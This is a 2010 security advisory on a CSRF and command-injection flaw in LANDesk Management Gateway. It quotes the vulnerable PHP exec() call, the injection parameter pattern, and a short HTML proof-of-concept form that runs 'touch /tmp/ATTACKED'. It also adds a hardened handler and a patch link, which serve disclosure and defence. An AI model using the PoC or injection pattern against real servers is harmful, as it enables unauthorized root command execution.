
LANDesk Management Gateway Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities

SSV ID:19099
Published:2010-02-05
Vulnerable:
LANDesk Software LANDesk Management Gateway 4.2
LANDesk Software LANDesk Management Gateway 4.0
Description:
BUGTRAQ  ID: 38119
CVE ID: CVE-2010-0368,CVE-2010-0369

The LANDesk Management Gateway is a secure systems management suite.

The LANDesk Management Gateway does not adequately validate the user who submits a specially crafted request. When the web application receives a request to delete a previously generated backup, the request is handled by gsb/BackupRestoreTab.php:

/-----
19  $cmd = "sudo /subin/backuptool --delete {$_POST['delBackupName']}";
20  exec($cmd);
21  $msg = "Successfully Removed: {$_POST['delBackupName']}";
- -----/

An attacker can craft the delBackupName parameter and trick a client into submitting an unintended request to the web server, producing an arbitrary command line (BackupRestoreTab.php:19) that is then executed in the web server's environment (BackupRestoreTab.php:20).

To trigger this vulnerability, one must be able to send a POST request to gsb/datetime.php with the following parameters:

/-----
<delBackupName>: 'a; [injection]'
<backupRestoreFormSubmitted>: 'b'
- -----/
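A hardened form of the deletion handler, added here as an illustration (it is neither LANDesk's code nor the vendor's fix): it ties the request to a per-session CSRF token, restricts delBackupName to a strict whitelist, and still quotes the argument with escapeshellarg() before exec(). The $post and $session arrays and the csrf_token field are assumptions.

```php
<?php
// Added hardening example, not LANDesk's code. Assumes the sudo rule and
// backup tool named in the advisory; the csrf_token field is hypothetical.
declare(strict_types=1);

// Backup names: alphanumerics, dot, underscore, dash; no shell metacharacters.
const BACKUP_NAME_RE = '/^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$/';

/** Return the backup name if it is well-formed, otherwise null. */
function validateBackupName(string $name): ?string
{
    return preg_match(BACKUP_NAME_RE, $name) === 1 ? $name : null;
}

/** Quote the argument as a single shell word (defense in depth after the whitelist). */
function buildDeleteCommand(string $name): string
{
    return 'sudo /subin/backuptool --delete ' . escapeshellarg($name);
}

/** Constant-time comparison of the session token with the submitted one. */
function csrfTokenValid(?string $sessionToken, ?string $submitted): bool
{
    return is_string($sessionToken) && is_string($submitted)
        && hash_equals($sessionToken, $submitted);
}

/** Request handler replacing the pattern at BackupRestoreTab.php:19-21. */
function handleDeleteRequest(array $post, array $session): string
{
    if (!csrfTokenValid($session['csrf_token'] ?? null, $post['csrf_token'] ?? null)) {
        return 'Rejected: missing or invalid CSRF token';
    }
    $name = validateBackupName((string) ($post['delBackupName'] ?? ''));
    if ($name === null) {
        return 'Rejected: backup name contains disallowed characters';
    }
    $output = [];
    $status = 1;
    exec(buildDeleteCommand($name), $output, $status);
    return $status === 0
        ? 'Successfully Removed: ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8')
        : 'Removal failed';
}

// Constructed demo: the advisory's injection pattern is rejected before exec() runs.
$session = ['csrf_token' => bin2hex(random_bytes(16))];
$post = ['delBackupName' => 'a; [injection]', 'csrf_token' => $session['csrf_token']];
echo handleDeleteRequest($post, $session), PHP_EOL;
```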
<*References
http://secunia.com/advisories/38474/
http://marc.info/?l=bugtraq&m=126538631521391&w=2
*>
Exploit:
The following procedures (methods) may contain something offensive; they are only for security research and teaching, use at your own risk!
/-----
<html>
  <head><title>LANDesk PoC</title></head>
  <body>
    <form method="post" action="https://[server]/gsb/datetime.php">
      <input type="text" name="delBackupName" value="; touch /tmp/ATTACKED">
      <input type="text" name="backupRestoreFormSubmitted" value="b">
      <input type="submit" value="Attack!">
    </form>
  </body>
</html>
- -----/
SEBUG Solution:
Vendor patch:

LANDesk Software
----------------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:

http://community.landesk.com/support/docs/DOC-8333/
// sebug.net [2010-02-08]